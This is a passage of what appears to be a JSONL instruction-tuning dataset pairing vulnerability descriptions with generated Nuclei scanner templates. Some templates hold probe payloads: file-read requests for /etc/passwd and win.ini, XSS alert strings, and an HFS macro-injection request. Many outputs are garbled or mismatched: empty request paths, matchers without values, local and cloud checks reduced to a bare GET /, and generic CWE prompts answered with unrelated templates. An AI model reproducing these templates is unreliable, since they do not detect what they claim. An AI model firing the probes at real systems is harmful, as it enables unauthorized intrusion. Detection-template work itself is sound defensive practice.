GET\n path:\n - \"{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt\" \n - \"{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt\" \n matchers:\n - type: word\n words:\n - \"BPS DB BACKUP LOG\" \n - \"==================\" \n part: body\n condition: and\n - type: regex\n part: body\n - type: word\n words:\n - \"text/plain\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-39327"} {"instruction": "Generate a Nuclei template for CVE-2023-6933", "input": "Title: Deserialization of Untrusted Data in wpengine better_search_replace\nSummary: The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: wpengine better_search_replace\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-6933\n\ninfo:\n name: Better Search Replace < 1.4.5 - PHP Object Injection\n author: pussycat0x\n severity: critical\n description: The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.\n tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,better-search-replace,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/better-search-replace/README.txt\" \n - \"{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-6933"} {"instruction": "Generate a Nuclei template for CVE-2022-32025", "input": "Title: SQL Injection in car_rental_management_system_project car_rental_management_system\nSummary: Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/view_car.php?id=.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: car_rental_management_system_project car_rental_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-32025\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{md5({{num}})}}\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-32025"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: dolphinscheduler-default-login\n\ninfo:\n name: Apache DolphinScheduler Default Login\n author: For3stCo1d\n severity: high\n description: Apache DolphinScheduler default admin credentials were discovered.\n tags: apache,dolphinscheduler,default-login,oss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"msg\":\"login success\"\" \n - \"\"sessionId\":\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: Panmicro E-Mobile System - Arbitrary File Read", "input": "Title: Panmicro E-Mobile System - Arbitrary File Read\nSummary: Panmicro E-Mobile System - Arbitrary File Read. The Panmicro E-Mobile client/cdnfile interface has an arbitrary file reading vulnerability. Unauthenticated attackers can use this vulnerability to read important system files, database configuration files, and so on.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: panmicro-arbitrary-file-read\n\ninfo:\n name: Panmicro E-Mobile System - Arbitrary File Read\n author: s4e-io\n severity: high\n description: The Panmicro E-Mobile client/cdnfile interface has an arbitrary file reading vulnerability. Unauthenticated attackers can use this vulnerability to read important system files, database configuration files, and so on.\n tags: panmicro,e-mobile,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/client/cdnfile/1C/Windows/win.ini?windows\" \n - \"{{BaseURL}}/client/cdnfile/C/etc/passwd?linux\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "panmicro-arbitrary-file-read"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: fosstodonorg-mastodon-instance\n\ninfo:\n name: Fosstodon.org (Mastodon Instance) User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Fosstodon.org (Mastodon Instance) user name information check was conducted.\n tags: osint,osint-social,fosstodonorg-mastodon-instance,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://fosstodon.org/api/v1/accounts/lookup?acct={{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"display_name\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Unshare - Privilege Escalation", "input": "Title: Unshare - Privilege Escalation\nSummary: Unshare - Privilege Escalation. The unshare command is used to run a command in a new namespace, which can isolate various aspects of the system, such as the mount namespace, network namespace, user namespace, and more.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-unshare\n\ninfo:\n name: Unshare - Privilege Escalation\n author: daffainfo\n severity: high\n description: The unshare command is used to run a command in a new namespace, which can isolate various aspects of the system, such as the mount namespace, network namespace, user namespace, and more.\n tags: code,linux,unshare,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-unshare"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: bigbluebutton-login\n\ninfo:\n name: BigBlueButton Login Panel\n author: myztique\n severity: info\n description: A BigBlueButton login panel was detected.\n tags: panel,bigbluebutton,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"content=\"BigBlueButton\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2023-33439", "input": "Title: SQL Injection in faculty_evaluation_system_project faculty_evaluation_system\nSummary: Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: faculty_evaluation_system_project faculty_evaluation_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-33439\n\ninfo:\n name: Faculty Evaluation System v1.0 - SQL Injection\n author: Harsh\n severity: high\n description: Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=\n tags: cve,cve2023,sqli,faculty,authenticated,faculty_evaluation_system_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-33439"} {"instruction": "Generate a Nuclei template for: Apache Ozone - Exposure", "input": "Title: Apache Ozone - Exposure\nSummary: Apache Ozone - Exposure. Detects if path /conf of Apache Ozone web application is exposed.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: apache-ozone-conf\n\ninfo:\n name: Apache Ozone - Exposure\n author: icarot\n severity: info\n description: Detects if path /conf of Apache Ozone web application is exposed.\n tags: tech,ozone,apache,detect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/conf\" \n matchers:\n - type: word\n words:\n - \"<source>ozone-default.xml</source>\" \n - \"ozone\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/xml\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "apache-ozone-conf"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: metasploit-panel\n\ninfo:\n name: Metasploit Panel - Detect\n author: lu4nx\n severity: info\n description: Metasploit Web Panel is detected\n tags: panel,metasploit,login,rapid7,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"<title>Metasploit\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Error based SQL Injection", "input": "Title: Error based SQL Injection\nSummary: Error based SQL Injection. Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data,\nor to override valuable ones, or even to execute dangerous system level commands on the database host.\nThis is accomplished by the application taking user input and combining it with static parameters to build an SQL query .\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: sqli-error-based\n\ninfo:\n name: Error based SQL Injection\n author: geeknik,pdteam\n severity: critical\n description: Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data,\nor to override valuable ones, or even to execute dangerous system level commands on the database host.\nThis is accomplished by the application taking user input and combining it with static parameters to build an SQL query .\n tags: sqli,error,dast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Adminer\" \n part: body\n - type: regex\n condition: or", "category": "generic", "severity": "critical", "id": "sqli-error-based"} {"instruction": "Generate a Nuclei template for: macOS Insecure /etc/hostconfig Permissions", "input": "Title: macOS Insecure /etc/hostconfig Permissions\nSummary: macOS Insecure /etc/hostconfig Permissions. Evaluates permissions on the /etc/hostconfig file used to configure system services on macOS.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: insecure-etc-hostconfig-permissions\n\ninfo:\n name: macOS Insecure /etc/hostconfig Permissions\n author: geeknik\n severity: high\n description: Evaluates permissions on the /etc/hostconfig file used to configure system services on macOS.\n tags: macos,audit,local,security\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "insecure-etc-hostconfig-permissions"} {"instruction": "Generate a Nuclei template for: Unrestricted SSH Access from Non-Whitelisted IPs", "input": "Title: Unrestricted SSH Access from Non-Whitelisted IPs\nSummary: Unrestricted SSH Access from Non-Whitelisted IPs. SSH access is not restricted to specific IP addresses, allowing connections from any source. This increases the risk of unauthorized access and brute-force attacks.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: file-ssh-unrestricted-nonwhitelist\n\ninfo:\n name: Unrestricted SSH Access from Non-Whitelisted IPs\n author: pussycat0x\n severity: info\n description: SSH access is not restricted to specific IP addresses, allowing connections from any source. This increases the risk of unauthorized access and brute-force attacks.\n tags: audit,config,file,ssh\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "file-ssh-unrestricted-nonwhitelist"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: git-config-nginxoffbyslash\n\ninfo:\n name: Nginx - Git Configuration Exposure\n author: organiccrap\n severity: medium\n description: Nginx is vulnerable to git configuration exposure.\n tags: config,exposure,nginx,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}{{paths}}\" \n matchers:\n - type: word\n words:\n - \"[core]\"", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-22536", "input": "Title: Vulnerability (CWE-444) in sap content_server and others\nSummary: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n\n\nVulnerability Type: Vulnerability (CWE-444)\nSeverity: critical\nAffected Products: sap content_server, sap netweaver_application_server_abap, sap web_dispatcher\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-22536\n\ninfo:\n name: SAP Memory Pipes (MPI) Desynchronization\n author: pdteam\n severity: critical\n description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: or\n - type: word\n words:\n - \"HTTP/1.0 400 Bad Request\" \n - \"HTTP/1.0 500 Internal Server Error\" \n - \"HTTP/1.0 500 Dispatching Error\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-22536"} {"instruction": "Generate a Nuclei template for: Datadog Access Token", "input": "Title: Datadog Access Token\nSummary: Datadog Access Token. Tags: datadog, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: datadog-accesstoken\n\ninfo:\n name: Datadog Access Token\n author: DhiyaneshDK\n severity: info\n description: Datadog Access Token\n tags: datadog,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "datadog-accesstoken"} {"instruction": "Generate a Nuclei template for: Facebook for WooCommerce Detection", "input": "Title: Facebook for WooCommerce Detection\nSummary: Facebook for WooCommerce Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-facebook-for-woocommerce\n\ninfo:\n name: Facebook for WooCommerce Detection\n author: ricardomaia\n severity: info\n description: Facebook for WooCommerce Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-facebook-for-woocommerce"} {"instruction": "Generate a Nuclei template for: Zend Server Test Page", "input": "Title: Zend Server Test Page\nSummary: Zend Server Test Page. Tags: tech, zend, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: zend-server-test-page\n\ninfo:\n name: Zend Server Test Page\n author: DhiyaneshDk\n severity: info\n description: Zend Server Test Page\n tags: tech,zend,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Zend Server Test Page\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "zend-server-test-page"} {"instruction": "Generate a Nuclei template for CVE-2023-40355", "input": "Title: Cross-Site Scripting (XSS) in axigen axigen_mobile_webmail\nSummary: Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: axigen axigen_mobile_webmail\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-40355\n\ninfo:\n name: Axigen WebMail - Cross-Site Scripting\n author: amir-h-fallahi\n severity: medium\n description: Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n tags: cve,cve2023,xss,axigen,webmail,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//\" \n - \"{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//\" \n - \"{{BaseURL}}/index.hsp?m=',alert(document.domain),'\" \n matchers:\n - type: word\n words:\n - \"\\\\'-alert(document.domain),//\" \n - \"',alert(document.domain),'\" \n part: body\n condition: or\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-40355"} {"instruction": "Generate a Nuclei template for: RDS RI Payment Failure", "input": "Title: RDS RI Payment Failure\nSummary: RDS RI Payment Failure. Identifies failed RDS Reserved Instance purchases due to payment failures, affecting potential cost savings.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: rds-ri-payment-fail\n\ninfo:\n name: RDS RI Payment Failure\n author: princechaddha\n severity: high\n description: Identifies failed RDS Reserved Instance purchases due to payment failures, affecting potential cost savings.\n tags: cloud,devops,aws,amazon,rds,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "rds-ri-payment-fail"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mobiproxy-dashboard\n\ninfo:\n name: MobiProxy Dashboard - Detect\n author: tess\n severity: medium\n description: MobiProxy dashboard was detected.\n tags: dashboard,exposure,mobiproxy,misconfig,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"MobiProxy\" \n - \"Dashboard\" \n - \"Setting\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: opennms-web-console\n\ninfo:\n name: OpenNMS Web Console Login Panel - Detect\n author: DhiyaneshDk\n severity: info\n description: OpenNMS Web Console login panel was detected.\n tags: panel,login,edb,opennms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/opennms/login.jsp\" \n matchers:\n - type: word\n words:\n - \"OpenNMS Web Console\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-1595", "input": "Title: Information Disclosure in hc_custom_wp-admin_url_project hc_custom_wp-admin_url\nSummary: The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request\nVulnerability Type: Information Disclosure\nSeverity: medium\nAffected Products: hc_custom_wp-admin_url_project hc_custom_wp-admin_url\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-1595\n\ninfo:\n name: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure\n author: theamanrawat,oleveloper\n severity: medium\n description: The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request\n tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: header\n - type: regex\n part: header\n - type: status\n status:\n - 302", "category": "cve", "severity": "medium", "id": "CVE-2022-1595"} {"instruction": "Generate a Nuclei template for: Weblogic T3 Protocol Detection", "input": "Title: Weblogic T3 Protocol Detection\nSummary: Weblogic T3 Protocol Detection. T3 is the protocol used to transport information between WebLogic servers and other types of Java programs.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: weblogic-t3-detect\n\ninfo:\n name: Weblogic T3 Protocol Detection\n author: F1tz,milo2012,wdahlenb\n severity: info\n description: T3 is the protocol used to transport information between WebLogic servers and other types of Java programs.\n tags: network,weblogic,detect,t3,oracle,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "weblogic-t3-detect"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Snyk Go", "input": "Title: Content-Security-Policy Bypass - Snyk Go\nSummary: Content-Security-Policy Bypass - Snyk Go. Tags: xss, csp-bypass, snyk-go\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: snyk-go-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Snyk Go\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Snyk Go\n tags: xss,csp-bypass,snyk-go,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"snyk.io\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "snyk-go-csp-bypass"} {"instruction": "Generate a Nuclei template for: Huawei HoloSens SDC - Panel", "input": "Title: Huawei HoloSens SDC - Panel\nSummary: Huawei HoloSens SDC - Panel. Huawei HoloSens SDC Panel was discovered.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: huawei-holosense-panel\n\ninfo:\n name: Huawei HoloSens SDC - Panel\n author: darses\n severity: info\n description: Huawei HoloSens SDC Panel was discovered.\n tags: panel,detect,huawei,holosens,iot,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and\n - method: POST\n path:\n - \"{{BaseURL}}/cgi-bin/main.cgi\" \n matchers:\n - type: dsl\n condition: and\n - method: POST\n path:\n - \"{{BaseURL}}/cgi-bin/main.cgi\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "huawei-holosense-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: sequoiadb-login\n\ninfo:\n name: SequoiaDB Login Panel - Detect\n author: dhiyaneshDk\n severity: info\n description: SequoiaDB login panel was detected.\n tags: sequoiadb,panel,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.html#/\" \n matchers:\n - type: word\n words:\n - \"<title>SequoiaDB\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: WebTrees Exposed Installation", "input": "Title: WebTrees Exposed Installation\nSummary: WebTrees Exposed Installation. WebTrees is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: webtrees-install\n\ninfo:\n name: WebTrees Exposed Installation\n author: ritikchaddha\n severity: high\n description: WebTrees is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,webtrees,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Setup wizard for webtrees\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "webtrees-install"} {"instruction": "Generate a Nuclei template for: Azure SQL Managed Instance TLS Version Not Latest", "input": "Title: Azure SQL Managed Instance TLS Version Not Latest\nSummary: Azure SQL Managed Instance TLS Version Not Latest. Ensure that your Microsoft Azure SQL managed instances are using the latest supported version of the TLS protocol (i.e. TLS 1.2) for inbound connections in order to enhance security by providing stronger encryption, protecting data integrity, reducing vulnerabilities to cyber attacks, and maintaining compatibility with modern browsers.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-sql-mi-tls-version-outdated\n\ninfo:\n name: Azure SQL Managed Instance TLS Version Not Latest\n author: princechaddha\n severity: medium\n description: Ensure that your Microsoft Azure SQL managed instances are using the latest supported version of the TLS protocol (i.e. TLS 1.2) for inbound connections in order to enhance security by providing stronger encryption, protecting data integrity, reducing vulnerabilities to cyber attacks, and maintaining compatibility with modern browsers.\n tags: cloud,devops,azure,microsoft,azure-sql,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-sql-mi-tls-version-outdated"} {"instruction": "Generate a Nuclei template for CVE-2014-6287", "input": "Title: Code Injection in rejetto http_file_server\nSummary: The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: rejetto http_file_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-6287\n\ninfo:\n name: HTTP File Server <2.3c - Remote Command Execution\n author: j4vaovo\n severity: critical\n description: HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}\" \n matchers:\n - type: word\n words:\n - \"<title>HFS /\" \n part: body\n - type: word\n words:\n - \"Set-Cookie: {{str1}}={{str2}};\" \n - \"text/html\" \n part: header\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2014-6287"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: axway-securetransport-webclient\n\ninfo:\n name: Axway SecureTransport Web Client Panel - Detect\n author: righettod\n severity: info\n description: AXWAY Secure Transport Web Client panel was detected.\n tags: panel,axway,securetransport,webclient,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html/skin/ric/C/config/default.config.json\" \n matchers:\n - type: word\n words:\n - \"header\": \"ST Web Client\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Azure App Service Application Insights Not Enabled", "input": "Title: Azure App 